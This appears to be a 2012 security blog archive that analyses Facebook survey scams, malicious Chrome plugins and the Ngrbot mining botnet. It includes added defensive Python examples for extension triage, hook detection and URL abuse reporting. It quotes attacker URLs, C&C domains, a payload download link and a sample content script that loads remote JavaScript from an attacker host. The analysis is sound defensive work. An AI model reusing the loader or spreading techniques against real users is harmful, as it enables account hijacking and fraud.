Jan 16, 2012

WoW This Free-Facebook Mugs Looking Very Nice - I have Ordered Free-Facebook Mug For Me,Did you Order Yours?

This latest Facebook scam is more elaborate than the earlier ones. It harvests the victim's Facebook login e-mail address, promotes further scam messages, pushes the victim into affiliate surveys and installs a malicious browser plugin. Below is the sample scam post with a link to fbmugoffer.info.



The link leads to a page like the one below, styled to look like Facebook so that people will trust it. It says "Facebook is giving away ceramic cofee mugs free of cost. Yes, you heard it right, you don't have to pay a single penny. Just verify your identity, and confirm you'nt Bot and we ship your mug right away." (spelling as on the scam page) and asks you to Like the page and click Continue.


Clicking Continue redirects to "http://freemug.info/mug.html", which carries some filler text and an Order now button.


Clicking Order now leads to freemug.info/verify.html, which asks users to enter their Facebook e-mail address, supposedly by checking the Facebook mobile login page.


After the e-mail address is entered and Verify is clicked, it redirects to "http://freemug.info/final.html", which lists surveys selected by the visitor's location and asks the user to complete them.


Examining http://freemug.info/mug.html showed that it also contains a script that installs a browser plugin named "Youtube Extension".


Once installed, the plugin watches for visits to facebook.com. When the user opens the site it loads two remote scripts, http://allinfree.net/justinbieberstabbedvideo/script.js and http://allinfree.net/just/et.js, which contain the code that posts the scam message "EXCLUSIVE!!!The Young Love Stolen Video Justin Bieber & Selena Gomez." to the victim's wall. Because the scripts are fetched from the attacker's server on every visit, the message can be changed at any time without touching the installed plugin.


Below is the sample scam post with the malicious link justin-v10.co.cc.


justin-v10.co.cc serves the page below. It contains a hidden Share button (a clickjacking overlay): wherever you click on the "video", the click lands on the Share button and the post is shared to your wall.


Another variant of this scam was found linking to http://embarrassingvideos.blogspot.com/?tviJOEO6 and http://upgradeyourtools.info/justin/,


which prompts you to install the malicious browser plugin from http://upgradeyourtools.info/plugin/youtube.crx.
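Both plugins above (the "Youtube Extension" dropped by freemug.info and the youtube.crx from upgradeyourtools.info) are ordinary Chrome extensions: a CRX2 container (magic "Cr24", version, public-key length, signature length, key, signature, then a zip) whose manifest declares a content script on facebook.com and whose script pulls further JavaScript from the attacker's server. The following is an added example of mine, not code from the blog or from either extension: it constructs a sample .crx with an assumed manifest and content script modelled on the behaviour described above, parses the CRX2 header, unzips it and flags the two tell-tale signs. The signature is not verified; the file names and manifest contents are assumptions.

```python
"""Triage a Chrome .crx: parse the CRX2 container, unzip it, and flag content
scripts that run on facebook.com and load remote JavaScript.

Added example. The sample extension is constructed here to mimic the behaviour
described in the post; its manifest, file names and script text are assumptions,
not the real "Youtube Extension".
"""
import io
import json
import re
import struct
import zipfile

CRX2_MAGIC = b"Cr24"


def build_sample_crx() -> bytes:
    """Construct a CRX2 blob around a zip holding a manifest and one content script."""
    manifest = {
        "name": "Youtube Extension",  # name from the post; everything else assumed
        "version": "1.0",
        "manifest_version": 2,
        "content_scripts": [{"matches": ["*://*.facebook.com/*"], "js": ["fb.js"]}],
    }
    content_script = (
        "var s = document.createElement('script');\n"
        "s.src = 'http://allinfree.net/just/et.js';\n"  # URL quoted in the post
        "document.body.appendChild(s);\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("manifest.json", json.dumps(manifest))
        zf.writestr("fb.js", content_script)
    pubkey = b"\x00" * 16  # placeholder key and signature; not verified below
    sig = b"\x00" * 16
    header = CRX2_MAGIC + struct.pack("<III", 2, len(pubkey), len(sig))
    return header + pubkey + sig + buf.getvalue()


def parse_crx2(data: bytes) -> dict:
    """Split a CRX2 blob into header fields and the embedded zip archive."""
    if data[:4] != CRX2_MAGIC:
        raise ValueError("not a CRX file")
    version, key_len, sig_len = struct.unpack_from("<III", data, 4)
    if version != 2:
        raise ValueError("unsupported CRX version %d" % version)
    off = 16
    pubkey = data[off:off + key_len]
    off += key_len
    sig = data[off:off + sig_len]
    off += sig_len
    return {"version": version, "pubkey": pubkey, "sig": sig, "zip": data[off:]}


# `x.src = "http://..."` assignments: the remote-script loader pattern.
REMOTE_SRC = re.compile(r"""\.src\s*=\s*['"](https?://[^'"]+)['"]""")
FB_MATCH = re.compile(r"facebook\.com", re.I)


def triage_extension(crx: bytes) -> dict:
    """Report facebook.com content scripts and the remote URLs they load."""
    parsed = parse_crx2(crx)
    with zipfile.ZipFile(io.BytesIO(parsed["zip"])) as zf:
        manifest = json.loads(zf.read("manifest.json"))
        findings = {"name": manifest.get("name"), "fb_content_scripts": [], "remote_scripts": []}
        for cs in manifest.get("content_scripts", []):
            if not any(FB_MATCH.search(m) for m in cs.get("matches", [])):
                continue
            for js in cs.get("js", []):
                findings["fb_content_scripts"].append(js)
                src = zf.read(js).decode("utf-8", "replace")
                findings["remote_scripts"].extend(REMOTE_SRC.findall(src))
    findings["suspicious"] = bool(findings["fb_content_scripts"] and findings["remote_scripts"])
    return findings


if __name__ == "__main__":
    print(json.dumps(triage_extension(build_sample_crx()), indent=2))
```

Point the same triage at a real .crx by reading the file instead of calling build_sample_crx(); an extension that both targets facebook.com and fetches its logic from a third-party host is worth pulling apart further, since the remote script is the part that actually posts the spam.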


There are multiple variants spreading across Facebook, so be cautious about what you click on. The post text of one more variant:

CLICK HERE TO WATCH IT: http://tinyurl.com/boobs1pPis

GUY TOUCHES 1000 BOOBS!!! INCREDIBLE!!!


Jan 14, 2012

Ngrbot – Bitcoin mining Botnet



A mining botnet is spreading across the internet, mostly through social networking sites and instant messengers. Once installed it downloads Bitcoin mining software and burns the victim's CPU and GPU time mining on the operator's behalf. It also steals personal and financial information from the infected system.

The dropper Sexy-IMAGE-DSC0000S4DF87911.jpeg.exe (MD5 D2B1FB926828778D993C1CD6C6894164) uses a double extension and a photo thumbnail icon so that it passes for an image. Opening the "image" runs the executable, which installs itself on the system.

The bot copies itself into the %USERPROFILE%\Application Data folder and adds a Run registry entry with a random value name that points to the copy.

It injects code into running processes and installs inline hooks by overwriting the first 5 bytes of each routine listed below with a JMP into its own code. It also downloads further payloads from free file-hosting sites, for example:

http://s546.hotfile.com/get/ac412325e76c9322271a960286bd486de0ba9ce1/4f10697c/2/c5b3fb429fdcb61b/86e5ee5/Bmw_M3.exe

kernel32.dll!CopyFileA
kernel32.dll!CopyFileW
kernel32.dll!CreateFileA
kernel32.dll!CreateFileW
kernel32.dll!MoveFileA
kernel32.dll!MoveFileW
ntdll.dll!LdrLoadDll
ntdll.dll!NtEnumerateValueKey
ntdll.dll!NtQueryDirectoryFile
ntdll.dll!NtResumeThread
WININET.dll!HttpSendRequestA
WININET.dll!HttpSendRequestW
WININET.dll!InternetWriteFile
WS2_32.dll!GetAddrInfoW
WS2_32.dll!send

The hooks on CopyFile/CreateFile/MoveFile, NtQueryDirectoryFile and NtEnumerateValueKey are what hide the bot's files and registry entries from the user and from any tool running inside a hooked process. The rest line up with the behaviour described below: HttpSendRequest, InternetWriteFile and send give it a view of outbound traffic (credential theft and IM/social-network spreading), GetAddrInfoW lets it interfere with name resolution, and NtResumeThread and LdrLoadDll are the usual means of following into newly created processes and loaded modules.
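A 5-byte inline hook of this kind is easy to spot in a memory dump or from an injected checker: the routine's first instruction is E9 rel32 (a near JMP), and the target, computed as address + 5 + rel32, lies outside the module that exports the routine. The following is an added example of mine, not code from the blog or from the bot: it decodes that jump and flags exports whose JMP lands outside their own module. The module ranges, export addresses and prologue bytes are constructed for illustration, not values from the analysed sample.

```python
"""Detect 5-byte inline hooks: an API routine whose first instruction has been
replaced by JMP rel32 (opcode E9) into code outside the exporting module.

Added example. Addresses, module ranges and byte strings are constructed for
illustration; they are not values taken from the analysed sample.
"""
import struct
from typing import Optional

# Common unhooked Win32 prologue: mov edi,edi / push ebp / mov ebp,esp
HOTPATCH_PROLOGUE = bytes.fromhex("8bff558bec")


def decode_jmp_hook(func_addr: int, first_bytes: bytes) -> Optional[int]:
    """Return the JMP target if the routine starts with E9 rel32, else None.

    x86 relative jumps are computed from the end of the 5-byte instruction:
    target = func_addr + 5 + rel32, with rel32 signed.
    """
    if len(first_bytes) < 5 or first_bytes[0] != 0xE9:
        return None
    (rel32,) = struct.unpack_from("<i", first_bytes, 1)
    return (func_addr + 5 + rel32) & 0xFFFFFFFF


def module_containing(addr: int, modules: dict) -> Optional[str]:
    """Name the module whose [start, end) range holds addr, if any."""
    for name, (start, end) in modules.items():
        if start <= addr < end:
            return name
    return None


def scan_exports(exports: dict, modules: dict) -> list:
    """Flag exports whose leading JMP leaves the module that exports them.

    exports: {"module.dll!Func": (address, first_bytes)}
    modules: {"module.dll": (start, end)}
    """
    hits = []
    for name, (addr, prologue) in exports.items():
        target = decode_jmp_hook(addr, prologue)
        if target is None:
            continue  # no JMP at entry; not hooked this way
        owner = name.split("!")[0].lower()
        landing = module_containing(target, modules)
        if landing is None or landing.lower() != owner:
            hits.append({"export": name, "addr": addr, "target": target, "landing": landing})
    return hits


def make_jmp(from_addr: int, to_addr: int) -> bytes:
    """Encode E9 rel32 from from_addr to to_addr (used to build the sample)."""
    rel = (to_addr - (from_addr + 5)) & 0xFFFFFFFF
    return b"\xe9" + struct.pack("<I", rel)


# Constructed sample: two hooked routines and one with its normal prologue.
MODULES = {
    "kernel32.dll": (0x7C800000, 0x7C8F6000),
    "ws2_32.dll": (0x71A10000, 0x71A27000),
    "<injected>": (0x00A20000, 0x00A40000),  # unbacked region holding bot code
}
EXPORTS = {
    "kernel32.dll!CreateFileW": (0x7C810800, make_jmp(0x7C810800, 0x00A21000)),
    "WS2_32.dll!send": (0x71A14C27, make_jmp(0x71A14C27, 0x00A21200)),
    "kernel32.dll!CopyFileA": (0x7C8286EE, HOTPATCH_PROLOGUE),
}

if __name__ == "__main__":
    for h in scan_exports(EXPORTS, MODULES):
        print("%s @ %08x -> %08x (%s)" % (h["export"], h["addr"], h["target"], h["landing"]))
```

A legitimate JMP at an entry point (a compiler thunk or an export forwarder) stays inside its own module and is not flagged; what gives the bot away is the landing address in a region no loaded module accounts for.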


The bot blocks the user from reaching certain security-vendor domains; the GetAddrInfoW hook is the natural place to do this, since it sees every name lookup the hooked process makes.




It creates the following mutex objects to mark its presence (useful as an infection indicator):
\BaseNamedObjects\1b37f31f-Mutex
\BaseNamedObjects\1b37f31f_0

It watches for instant-messaging processes in memory and spreads through them.




It can also spread through removable drives, and it can compose messages carrying a malicious link and send them from compromised social-networking accounts on Facebook, Twitter, Bebo, Friendster and Vkontakte.


It steals user credentials when the victim logs in to certain websites; the HttpSendRequest hook in particular sees the form data before WinINet encrypts it, so HTTPS logins are no protection on an infected host.


Bitcoin is a digital currency. Miners bundle transactions into blocks and compete to solve a proof-of-work puzzle for each block; the first to solve it is rewarded with newly minted bitcoins. The botnet uses the infected systems' computing power to mine on the operator's behalf, so the operator keeps the reward and the victim pays the electricity. Below you can see the bot using a CUDA GPU miner to work on a block.


The bot contacts its C&C servers for commands and for updates to itself. Below are some of the sites contacted by the bot.

xL.x1x2.in
appupdate.org
xL.0days.me
myupload01.info
xL.a7aneek.net
xL.honeycat.org
xL.5days.in
xL.psybnc.cz







Jan 13, 2012

OMG! hahaha i know who visited my profile! Those tagged have visited my profile the last week!

Hi all! Here is a new variant of an old survey scam going around on Facebook. This time it gets you to click the malicious link by claiming to show who visited your profile: "To know how click on the link http://tinyurl.com/profilevieweroFORn". It also carries a second link, to a fake photo on Flickr that in turn points at the malicious link, so whichever link you click you end up on a page hosting it.



The TinyURL redirects to the Blogspot page 'profile-ghost-viewer20.blogspot.com', which loads the script easy-tricks.info/profileviewer/include.js to render the content below.


Like any other Facebook scam it asks you to follow a few steps, because at this point nothing has happened yet: the scam needs your actions both to spread and to infect your browser. Clicking Install in the first step installs a browser plugin like the one shown below.


The second step, making sure you are signed in to Facebook, is the real trap: the plugin can only spread if you have a logged-in session. The third step triggers the plugin, which posts spam to your wall. The message need not be this one; the plugin can post whatever old or new message the spammer has configured.

Notice the "Like our page" in step 1. Checking that page, it is promoting some videos and already has 11,110 likes.


Now for the Flickr photo linked from the post. It too asks you to click the malicious link to learn more.


The link easy-tricks.info/profileviewer/ sends you on to easy-tricks.info/profileviewer/widget.php, which pops up a window listing surveys to complete before you can supposedly see your profile visitors.


You only end up filling in surveys that earn the spammer affiliate money; there is nothing legitimate here. If you followed these steps you are a victim of this scam, so remove the plugin immediately from your browser's extension settings.

Jan 5, 2012

Switch To Red Facebook (Limited Time!)

Red Facebook installs 'Yontoo', which some AV vendors classify as adware. The tagline used is "Say goodbye to the boring blue profile and say hello to the new red profile!!"



Clicking the post redirects you to www.redfbprofile.info, which asks you to follow two steps to get the new red Facebook profile.


The first step is to share the post with your Facebook friends. The second is to comment something positive about Red Facebook, which you have not even seen yet. Once done you are redirected to the page below.


Here, Download now fetches download.pagerage.com/PageRageSetupAff.exe, which installs the Yontoo browser plugin; it may display ads while you are on Facebook or other sites.


Below is the installed browser plugin, Yontoo 1.0.1.


If you are a Chrome user, go to Tools->Extensions->Remove.

Always install applications from a trusted source, and understand what you are sharing before you pass it on to your friends on any social network.

Jan 3, 2012

HEY!! LET ALL OF US TRY AND WIN THESE 4 FREE SOUTHWEST AIRLINE TICKETS AND GO SOMEWHERE WARM.WE ALL MIGHT WIN AND WE CAN VACATION TOGETHER.



Above is a recent Facebook scam. Clicking the scam link takes you to a phony marketing survey and also installs an adware program. Below is the spam posted on an infected user's wall.


The link in the spam leads to www.airlinesticketssr.blogspot.com, a Blogspot site created specifically to host the scam content. Wherever you click on the page below, it redirects you to http://trax77.com, which in turn identifies your location.


Only visitors from certain countries, for example the US, are shown the site below, 'try.bestairlinetickets.co'. It asks you to enter your e-mail address and click Continue.




Next it opens a fake registration page and asks you to enter your personal information to claim your 2 free Southwest Airlines tickets.


Then it asks you to complete a "5 minute" survey of 13 personal questions.


Once the survey is completed it asks you to follow a 3-step process, which includes sharing the message on Facebook and installing a browser plugin called ShopAtHome. Some AV vendors detect it as adware, others as trackware or a potentially unwanted application, since it can monitor browser activity and display results based on your search queries; some report that it redirects visits to merchant sites so as to collect the affiliate fees automatically. Whatever the label, there are no free air tickets for you.


If you are a Chrome user you are prompted with the window below. Note the list of things the plugin can do once installed, and keep that in mind for any browser plugin you install.


To remove the plugin, if you are a Chrome user, go to Tools->Extensions->Remove.


A similar variant, '2 FREE Southwest Airline Tickets! (limited time only)', reads: Southwest Airline is currently giving away 2 FREE Tickets to all facebook users!



Domains currently active are rewards02.s3-website-us-west-1.amazonaws.com, flyfreetoday.s3-website-eu-west-1.amazonaws.com, flyingplane.s3-website-eu-west-1.amazonaws.com, plane4.s3-website-us-east-1.amazonaws.com, flyingplane2.s3-website-eu-west-1.amazonaws.com and flyfreer.s3-website-eu-west-1.amazonaws.com, all static websites served from Amazon S3 buckets.

Jan 1, 2012

"This girl killed herself after watching this video!" - Spanish Version


We have already seen this kind of scam spreading across English-speaking countries. A similar variant has now appeared in Spanish: "Esta Chica se suicidó, después de ver este video! El vídeo más terrible que he visto jamas!" ("This girl killed herself after watching this video! The most terrible video I have ever seen!").


The post above takes you to yyylike.co.cc, where an image, <img src="http://i.imgur.com/XG1EQ.jpg">, is laid out to look like a video player titled "This girl killed herself after watching this video!".


It also shows 3 steps to follow in order to view the "original" video: clicking Like and sharing the video on your wall, purely to spread the scam message among your friends. It will not let you jump straight to the third step; a script checks that you have clicked both Like and Share.


Even a right-click anywhere on the page brings up an alert: "Follow the 2 Steps It's Easy!"


Once the steps are completed it pops up a new window loading yyylike.co.cc/video.php, saying "Click on one of the following links to view the video". The links only redirect to survey scams, as expected; nothing legitimate here. So always stay away from suspicious links.


Domains similar to yyylike.co.cc are jupilake.co.cc, karionix.co.cc, kiolopes.co.cc, cdaribe.co.cc, kalipsoo.co.cc, nahuila.co.cc, baxilok.co.cc, poderop.co.cc, lopoli.co.cc and juliopac.co.cc.

(LEAKED) You Wont Believe Who Nicki Minaj Got CAUGHT ON TAPE with - You will lose all respect for NICKI MINAJ after watching this video



What follows is not a video, just another survey scam spreading across Facebook, abusing the fame of the American artist Nicki Minaj to get attention and lure users into clicking the malicious link.


The link http://184.107.51.105/~videoz/ in the post redirects to http://nickivideo.s3-website-us-east-1.amazonaws.com/, a static website served from an Amazon S3 bucket. Recently we are seeing a lot of malicious sites hosted on this service. It would help if people reported them to Amazon as soon as they identify abusive content hosted there.
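The S3 website endpoints here and in the Southwest Airlines post above encode exactly what an abuse report to Amazon needs, the bucket name and region, in the hostname; the other links across these posts fall into a few recurring free-hosting and redirector families. The following is an added example of mine, not code from the blog: it parses the URLs quoted in the posts and groups them by hosting family with the reporting target for each. The URL list is constructed from the links quoted above; the family labels, regexes and report-to mapping are my own assumptions.

```python
"""Pull the details an abuse report needs out of the scam URLs quoted in these posts.

Added example. The URL list is constructed from links quoted in the posts; the
hosting-family labels, regexes and report-to mapping are assumptions.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# S3 static-website endpoint: <bucket>.s3-website-<region>.amazonaws.com
# (older regions put a dash before the region, newer ones a dot).
S3_WEBSITE = re.compile(
    r"^(?P<bucket>[a-z0-9][a-z0-9.-]*)\.s3-website[-.](?P<region>[a-z]{2}-[a-z]+-\d)\.amazonaws\.com$"
)

# Free hosting / redirector families that recur across the posts.
FAMILIES = {
    "blogspot": re.compile(r"\.blogspot\.[a-z.]+$"),
    "co.cc": re.compile(r"\.co\.cc$"),
    "tinyurl": re.compile(r"^tinyurl\.com$"),
}
REPORT_TO = {
    "s3-website": "AWS abuse",
    "blogspot": "Blogger abuse",
    "co.cc": "co.cc registrar",
    "tinyurl": "TinyURL abuse",
    "raw-ip": "netblock owner (whois)",
}


def classify_url(url: str) -> dict:
    """Name the hosting family of a URL and, for S3, the bucket and region."""
    if "://" not in url:
        url = "http://" + url  # posts quote bare hostnames too
    host = (urlsplit(url).hostname or "").lower()
    info = {"host": host, "family": "other"}
    m = S3_WEBSITE.match(host)
    if m:
        info.update(family="s3-website", bucket=m["bucket"], region=m["region"])
    elif re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host):
        info["family"] = "raw-ip"
    else:
        for family, pat in FAMILIES.items():
            if pat.search(host):
                info["family"] = family
                break
    info["report_to"] = REPORT_TO.get(info["family"])
    return info


def summarise(urls) -> dict:
    """Group distinct hosts by family; S3 entries are rendered as bucket@region."""
    out = defaultdict(list)
    for u in urls:
        c = classify_url(u)
        label = "%s@%s" % (c["bucket"], c["region"]) if c["family"] == "s3-website" else c["host"]
        if label not in out[c["family"]]:
            out[c["family"]].append(label)
    return dict(out)


SEEN_URLS = [  # constructed from links quoted in the posts above
    "http://184.107.51.105/~videoz/",
    "http://nickivideo.s3-website-us-east-1.amazonaws.com/",
    "rewards02.s3-website-us-west-1.amazonaws.com",
    "flyfreetoday.s3-website-eu-west-1.amazonaws.com",
    "http://tinyurl.com/profilevieweroFORn",
    "profile-ghost-viewer20.blogspot.com",
    "pluginviritscript.blogspot.it",
    "yyylike.co.cc",
    "justin-v10.co.cc",
    "http://trax77.com",
]

if __name__ == "__main__":
    for fam, hosts in summarise(SEEN_URLS).items():
        print("%-12s %s" % (fam, ", ".join(hosts)))
```

The bucket@region pairs are what to put in the report; the "other" bucket (here trax77.com and the like) still needs a whois lookup, which the example deliberately does not do offline.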


When you try to play the video by clicking the Play button you are shown the message "Restriction To start the video, please share it again and click the play button".


A JavaScript check verifies whether you have shared the page and keeps showing the alert until you do. Once shared, the post appears on your wall, your friends may click it and spread it just as you did, and so it keeps spreading across Facebook.


After sharing, clicking Play takes you to a new site, youtubo.info/shirt/007-N.php, containing the survey to be completed.


After all this there is no video, just a survey scam like many others. Spammers pick trending topics to attract users and set a trap so that they click the malicious link. Be careful what you click on and stay protected.


Another similar scam was found: "EMINEM BEAT UP and STABBED Outside Detroit Night Club!" and "EMINEM STABBED By CRAZZY Fan Outside L.A. NightClub!"



Clicking the scam post takes you to examplesofspeech.com/video/1.php, shown below.


An updated version of this scam, "OMG I Just Hate RIHANNA After Watching This Video", installs a malicious browser plugin; see below.


Clicking the link leads to a compromised web page designed to look like Facebook, which asks you to install the malicious plugin.


The page has an iframe that pulls in malicious sites such as pluginviritscript.blogspot.it, which installs the rogue plugin from viralscripts.it/divx2/youtube.crx. So never install a plugin from an unreliable site.